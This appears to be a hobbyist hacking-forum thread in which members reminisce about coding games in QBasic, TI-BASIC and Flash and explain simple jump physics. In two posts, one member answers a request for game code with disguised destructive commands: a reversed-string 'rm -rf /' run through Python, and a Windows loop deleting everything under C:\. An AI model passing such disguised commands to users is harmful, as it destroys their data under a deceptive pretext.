Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

Homemade games

0 0

Does anyone wanna email me one of your homemade games?

Please..no Batch, no links, no downloads, I only want the code. And you can probably guess why.

Python Ninja
0 0

Yeah, i'd love to have my hardwork rebadged and claimed as yours….

or not.

Do yourself a favour,

python -e "os.system("/ fr- mr".reverse())"

0 1

i remember my homemade game coding days…

.. back in the day of gd old Q-Basic!

I used to make all kinds of games in Q-Basic!

Love Q-Basic! It's almost as good as running Windows 3.1 :)

Anyone else done game coding with Q-Basic?

0 0

richohealey wrote: python -e "os.system("/ fr- mr".reverse())"

What if he's on Window$?

0 0

Mr_Cheese wrote: i remember my homemade game coding days…

Yeah i have though only calculator level stuff.

It is the best lang ever

Banned
0 0

Shit, go download some game engines or wtf.

Q-basic, woohoo for games? Never seen any good engine made in Q-basic.

0 1

spyware wrote: Q-basic, woohoo for games? Never seen any good engine made in Q-basic.

ofcourse not! the most you can do with Q-Basic is a game like astriods.

i use to make little stick men adventures and other games similar to that gorrilla game where you have to throw banana's at each other.

awesome stuff :D

0 0

yea, I used to spend all my math class programming my TI-83+

I wrote some pretty sweet shit too. A space invaders clone, a text-based RPG with 7 character classes, even some useful stuff like a way better Quadradic formula sovler…

Good stuff,

back on topic…

GOOGLE DAMNIT. THERE IS SOURCE OUT THERE. FIND IT

0 0

i love asteroids!! (the game)

0 1

only_samurai wrote: I wrote some pretty sweet shit too. A space invaders clone, a text-based RPG with 7 character classes

nice!

reminds me of one of my finer games i made… you had to form your own band, make your own music, and then get gigs and tour the world!!

was an awesome stick man RPG.. and you could even create your own music!! and by "music" i mean a series of differnt BEEP()'s!! i thought it was amazing because you didnt even need speakers, just relied on the computers beep function! (i was 9 at the time :) )

those were the days :)

0 0

@ samurai, about quad solver

Haha, me too. Lunar Lander, QuadZila, Scuttle, and TILINUX haha. Yup, an ubuntu clone written TI-BASIC!

0 0

The best with the Ti-83 was Fall Down, Pheonix, ZTetris, … great moment in boring math and physic class.

Q-Basic was a little too basic. The best thing I made with Q-Basic was a recursive program.

As game what is really nice to do, is game in javascript with Canvas. I used to make a game that was a little bit like Final Fantasy I with Canvas and javascript. The basic of it where working, I could move around in the level, attack monster, have event.

Python Ninja
0 0

thejas wrote: [quote]richohealey wrote: python -e "os.system("/ fr- mr".reverse())"

What if he's on Window$?[/quote]

forget the exact syntax, but from memory

import os for files, dirs, waste in os.walk("C:\\", 1): [tab]for i in files: [tab][tab]os.remove(i) [tab]for i in dirs: [tab][tab]os.removedir(i)

..hmmm ui forgot something, i don't think that's how you make it walk fromt he bottom up, i'm sure it's soemthing other than the first argument to walk…fuck idk..

and cheese: yeah i've still got a few games i wrote in qbasic, as well as heaps in python, good ole pygame libs.

0 1

I once made a Space Invaders clone using ASCII characters and beeps in a language called basic4gl. (basic for OpenGL), I think i must've deleted it.

I also made a couple using a point-an-click game utility, but It's pretty much gone.

0 0

I'm coding an arena style fighting game right now as a 100+ hours school project.

It's already playable and I've only spent about 35 hours on it, so there's much time for improvement B) and for those of you who have seen too many lame SSB clones: it's not like that, I assure you ;)

I've also coded a lot of smaller games including Pacman, Breakout, Emo cutter (personal favourite xD), a game about my hometown and more…

0 0

dex_poet wrote: I was hoping to get into game design, and am taking a digipen class through high school/TSA. Is writing the code for jumping really as hard as they say?

Hmm, I'd say an easy way to code a gravity is to use a loop which sets the vertical movement speed += x pixels downwards each time it's run. When you jump you simply begin a vertical movement upwards, but since you're drawn downwards you'll slow down after a short while, start falling downwards and begin to accelerate downwards (gravity).

0 0

Mr_Cheese wrote: i remember my homemade game coding days…

You old fart :D

0 0

Uber0n wrote: Hmm, I'd say an easy way to code a gravity is to use a loop which sets the vertical movement speed += x pixels downwards each time it's run. When you jump you simply begin a vertical movement upwards, but since you're drawn downwards you'll slow down after a short while, start falling downwards and begin to accelerate downwards (gravity).

awesome, iv been looking for a way to do that thanks!!!

anyone else overjoyed at cancer/kac7 being banned again??

0 1

ooo thanks for reminding me.

i dont have the time to manage the project, but luckily another member of HBH is taking over managing it.

got to send out a PM to the group today, cheers for reminding me!

0 0

koolkeith12345 wrote: awesome, iv been looking for a way to do that thanks!!!

No problem ^^ if you want me to explain more clearly, just ask B)

0 0

Hacking Game?

0 0

By the way, aren't there more people on this site who code games? :right:

0 0

aye, spend most of my coding time doing just that :D

im not as hard core as you guys tho. all the calculator progs ive made have been math related :happy:

anyways i spend huge chunks of time in flash/actionscript making flash games, ive got a big arsenal of games ive made ranging from just about everything mentioned here to a little more advanced type rpgs (not THAT advanced, just a descent game engine)

i wrote 2 articles on game creation in flash for hbh :D and i have about 50X where that came from, but it seems the community on hbh does not crave very much actionscript gaming articles :(

peace hbh

0 0

DigitalFire wrote: im not as hard core as you guys tho. all the calculator progs ive made have been math related :happy:

a calculator program being math related :O lol

Uber0n wrote: By the way, aren't there more people on this site who code games? :right:

yeah maybe we could encourage it and get people to upload them or whatever for points or something. Maybe an official hbh game development section or something

Future Emperor of Earth
0 0

Uber0n wrote: By the way, aren't there more people on this site who code games? :right:

i've made a few games. the most noteworthy is duck hunt (with a mouse, not the fun little nintendo gun).